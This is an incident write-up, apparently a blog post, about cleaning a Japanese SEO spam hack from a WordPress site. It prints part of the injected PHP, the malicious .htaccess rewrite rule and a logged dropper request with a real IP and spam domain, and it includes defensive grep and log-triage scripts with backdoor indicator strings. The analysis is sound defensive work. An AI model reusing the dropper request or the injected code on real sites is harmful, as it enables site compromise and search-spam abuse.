Japanese SEO hack in WordPress

Japanese SEO spam showing up in Google

Ever encountered unknown PHP code injected at the top of your index.php file? I had the same issue on my WordPress website: an unknown PHP script had been injected at the top of index.php. Below is a sample of that PHP code:

<?php
@set_time_limit(3600);          // let the script run for up to an hour; the @ suppresses warnings
@ignore_user_abort(1);          // keep running even if the visitor disconnects
$xmlname = 'mapss271.xml';      // XML file name used further down (that part is chopped)
$jdir = '';
$smuri_tmp = smrequest_uri();   // the path the visitor requested
if($smuri_tmp==''){
    $smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp); // base64 of the request URI, consumed by the chopped part
$dt = 0;
// Rebuilds the request URI, falling back to PHP_SELF plus argv or the query
// string where REQUEST_URI is not set (CLI or non-Apache SAPIs).
function smrequest_uri(){
    if (isset($_SERVER['REQUEST_URI'])){
        $smuri = $_SERVER['REQUEST_URI'];
    }else{
        if(isset($_SERVER['argv'])){
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        }
        else{
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $smuri;
}
--- CODE CHOPPED ---

So the next step to get rid of it is to delete the injected code, right? I deleted the injected code and was left with no malware.

The next day I got an alert from my malware scanner that index.php was infected again. I logged into the server and found the same code at the top of index.php. Clearly something else was going on: I knew my WordPress had been hacked, but I wanted to know how this malicious PHP script kept getting re-injected into index.php. So I started searching the files on the server for strings that are typical of this kind of PHP script, i.e. the ones attackers use. To name a few:

eval
md5($_POST
getcwd()

I got many results and went through every file that came up. While analyzing them I found one file that looked innocent but was suspicious: db_lookups.php under /public_html/wp-admin/network/. I then checked whether that file ships with a default WordPress installation by comparing against https://github.com/WordPress/WordPress. There is no file called db_lookups.php in WordPress.
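The two checks above, grepping for indicator strings and listing PHP files that a pristine WordPress copy does not contain, are easy to script. The following is an added example, not code from the post: it builds a small constructed webroot (hypothetical file contents, including a stand-in for db_lookups.php) so it runs offline. On a real server you would point it at the site root and at a file list generated from a fresh WordPress download, as the comments show.

```shell
#!/bin/sh
# Added example (not the post's own code): triage a WordPress webroot for
# injected PHP in two passes: (1) grep for the indicator strings the post
# searched for, (2) list .php files that a pristine WordPress copy does not
# have. The webroot and pristine list are constructed below so it runs
# offline; every path and file body in them is hypothetical.

# Indicator strings as an extended regex: the three from the post plus common
# companions of PHP backdoors. Hits need manual review; they are not proof.
INDICATORS='eval\(|md5\(\$_POST|getcwd\(\)|base64_decode\(|set_time_limit\(|ignore_user_abort\('

# Pass 1: print every .php file under $1 containing at least one indicator.
scan_indicators() {
  find "$1" -type f -name '*.php' -exec grep -lE "$INDICATORS" {} + 2>/dev/null | sort
}

# Pass 2: print .php files under $1 (relative paths) that are absent from $2,
# a file listing the relative paths of a pristine install. On a real server
# build that list with:  (cd /path/to/fresh/wordpress && find . -name '*.php')
unknown_files() {
  good=$(mktemp)
  sort "$2" > "$good"
  (cd "$1" && find . -type f -name '*.php' | sed 's|^\./||' | sort) | comm -23 - "$good"
  rm -f "$good"
}

# Constructed sample webroot: one clean file, an injected index.php, and a
# dropper-style file in wp-admin/network like the one the post found.
make_sample_webroot() {
  root=$(mktemp -d)
  mkdir -p "$root/wp-admin/network" "$root/wp-includes"
  printf '<?php\nfunction wp_hello() { return "hi"; }\n' > "$root/wp-includes/clean.php"
  printf '<?php\n@set_time_limit(3600);\n@ignore_user_abort(1);\n$u = base64_encode($_SERVER["REQUEST_URI"]);\n' > "$root/index.php"
  printf '<?php\nif (md5($_POST["k"]) === "x") { eval(base64_decode($_POST["c"])); }\necho "ok";\n' > "$root/wp-admin/network/db_lookups.php"
  # Hypothetical pristine list: only the two files a clean install would have here.
  printf 'index.php\nwp-includes/clean.php\n' > "$root/known-good.txt"
  printf '%s\n' "$root"
}

# Usage on a live site (paths are placeholders):
#   scan_indicators /var/www/html
#   unknown_files /var/www/html /tmp/pristine-wordpress-files.txt
```

Pass 2 is the more reliable of the two: an attacker can obfuscate away every string in the indicator list, but cannot make a file that WordPress never shipped disappear from a directory listing. Run both against themes, plugins and wp-content/uploads as well, not just core.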

I then browsed to this file directly. The browser showed nothing but "ok".

The PHP code inside db_lookups.php was published separately for anyone who wants to analyze it.

Next, it must be doing something to index.php and .htaccess, right? So I checked my .htaccess file:

# BEGIN WordPress

RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

A default WordPress installation does not include the line "RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$ index.php?tempweb=$1&smid=$2 [L]". You can check the stock rules at https://codex.wordpress.org/htaccess. The injected rule turns any URL of the form /xxxYYYYY/123/ (three alphanumerics, five to nineteen more, a slash, up to seven digits, a slash) into an internal request to index.php with tempweb and smid parameters, and because the injected PHP sits at the very top of index.php it handles those requests before WordPress ever sees them.
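Comparing an .htaccess against the stock block by eye is error-prone, so here is an added example (not the post's code) that prints any Rewrite directive inside the "# BEGIN WordPress" markers that the stock block does not contain, and emulates the injected rule with sed so you can see which request paths it hijacks. The .htaccess it checks is constructed from the listing above; the stock directives are the ones documented at https://codex.wordpress.org/htaccess.

```shell
#!/bin/sh
# Added example (not the post's own code): check a WordPress .htaccess for
# rewrite rules that the stock "# BEGIN WordPress" block does not contain,
# and emulate the injected rule to see which URLs it hijacks. The .htaccess
# below is constructed from the post's listing.

# Rewrite directives of the stock WordPress block (per codex.wordpress.org/htaccess).
# Anything else between the markers is worth a look.
DEFAULT_WP_RULES='RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]'

# Print Rewrite* lines between the BEGIN/END WordPress markers of $1 that are
# not part of the stock block.
htaccess_extra_rules() {
  stock=$(mktemp)
  printf '%s\n' "$DEFAULT_WP_RULES" | sort > "$stock"
  sed -n '/^# BEGIN WordPress/,/^# END WordPress/p' "$1" | grep '^Rewrite' | sort | comm -23 - "$stock"
  rm -f "$stock"
}

# Emulate the injected rule on a request path. The path is given without the
# leading slash, which is how mod_rewrite sees it in a per-directory .htaccess.
# Prints the internal target, or nothing if the rule does not match.
spam_url_to_query() {
  printf '%s\n' "$1" | sed -nE 's#^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$#index.php?tempweb=\1\&smid=\2#p'
}

# Constructed .htaccess reproducing the compromised one from the post.
make_sample_htaccess() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# BEGIN WordPress

RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7})/$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress
EOF
  printf '%s\n' "$f"
}

# Usage on a live site (path is a placeholder):
#   htaccess_extra_rules /var/www/html/.htaccess
#   spam_url_to_query 'abcdefghij/12345/'   # a path the spam rule would capture
```

A path such as abcdefghij/12345/ becomes index.php?tempweb=defghij&smid=12345, while an ordinary permalink like about-us/ is left for WordPress; that is the shape of the spam URLs you will later find indexed under the site.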

I then checked the access log to see whether anyone had requested db_lookups.php. I found the following GET request (note the User-Agent: Google's crawler does not identify itself as a bare "Googlebot", so this is a forged UA meant to blend into crawler traffic):

104.223.140.126 - - [19/Sep/2017:10:47:40 +1000] "GET /wp-admin/network/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r HTTP/1.1" 200 171 "-" "Googlebot"

To check whether this request was what triggered the injection, I first removed the injected code from index.php and then entered the following in my browser:

example.com/wp-admin/network/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r

I then checked index.php, and the injected malicious PHP code was back.
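Finding that log line by hand is fine once you know the file name; what a practitioner wants is a way to surface it before knowing. Here is an added example (not the post's code) that works through an Apache combined-format access log in two passes: requests to .php paths that a pristine WordPress copy does not have, and requests whose User-Agent mentions Googlebot but lacks the "Googlebot/<version> ... google.com/bot.html" shape Google publishes for its crawler. The log lines, the IPs (RFC 5737 test addresses) and the known-file list are all constructed, and the UA heuristic is an assumption stated in the code; the definitive crawler check is reverse DNS plus forward lookup, which needs the network.

```shell
#!/bin/sh
# Added example (not the post's own code): triage an Apache combined-format
# access log for (a) requests to .php files that a pristine WordPress copy
# does not have, and (b) requests whose User-Agent claims to be Googlebot but
# does not match Google's documented crawler strings. The log lines and IPs
# below are constructed (RFC 5737 test addresses), not real traffic.

# (a) Print log lines whose request path ends in .php and is not listed in $2,
# a file of relative paths taken from a pristine WordPress install.
requests_to_unknown_php() {
  awk -F'"' -v good="$2" '
    BEGIN { while ((getline line < good) > 0) known["/" line] = 1 }
    {
      split($2, req, " ")             # $2 is the quoted request: GET /path?q HTTP/1.1
      path = req[2]; sub(/\?.*/, "", path)
      if (path ~ /\.php$/ && !(path in known)) print $0
    }' "$1"
}

# (b) Print client IPs whose UA mentions Googlebot but lacks the
# "Googlebot/<version> ... google.com/bot.html" shape Google publishes
# (assumption: that is what every genuine Googlebot UA contains). A UA can be
# forged either way; the definitive check is reverse DNS of the IP to
# googlebot.com or google.com followed by a forward lookup, omitted here.
forged_googlebot_ips() {
  awk -F'"' '$6 ~ /Googlebot/ && $6 !~ /Googlebot\/[0-9.]+.*google\.com\/bot\.html/ { print $1 }' "$1" \
    | awk '{ print $1 }' | sort -u
}

# Constructed sample log: a dropper hit with a bare "Googlebot" UA (like the
# one in the post), a normal login, a genuine-looking crawler hit, and a hit
# on a real core file. The known-file list beside it is hypothetical.
make_sample_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
203.0.113.5 - - [19/Sep/2017:10:47:40 +1000] "GET /wp-admin/network/db_lookups.php?u=i&m=EXAMPLE&web=example.net&k=r HTTP/1.1" 200 171 "-" "Googlebot"
198.51.100.7 - - [19/Sep/2017:10:48:01 +1000] "GET /wp-login.php HTTP/1.1" 200 2331 "-" "Mozilla/5.0"
192.0.2.9 - - [19/Sep/2017:10:49:12 +1000] "GET /some-post/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [19/Sep/2017:10:50:00 +1000] "GET /index.php HTTP/1.1" 200 100 "-" "curl/7.55.1"
EOF
  printf 'index.php\nwp-login.php\n' > "$f.known"
  printf '%s\n' "$f"
}

# Usage on a live site (paths are placeholders):
#   requests_to_unknown_php /var/log/apache2/access.log /tmp/pristine-wordpress-files.txt
#   forged_googlebot_ips /var/log/apache2/access.log
```

On the constructed log only the db_lookups.php request is reported by the first pass, and only 203.0.113.5 by the second; the same IP showing up in both is exactly the pattern the post's log line shows. Once you have the IP, grep the full log for it to recover the earlier request that dropped db_lookups.php in the first place.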

This was my scenario; yours may differ: a different CMS, different file names, and so on. If you are using WordPress, you should install a fresh copy after removing all the old files. Replacing core alone is not enough if the dropper lives in a theme, a plugin, wp-content/uploads or the database, so compare every directory against a known-good copy, and rotate the admin passwords and the keys in wp-config.php once the site is clean.
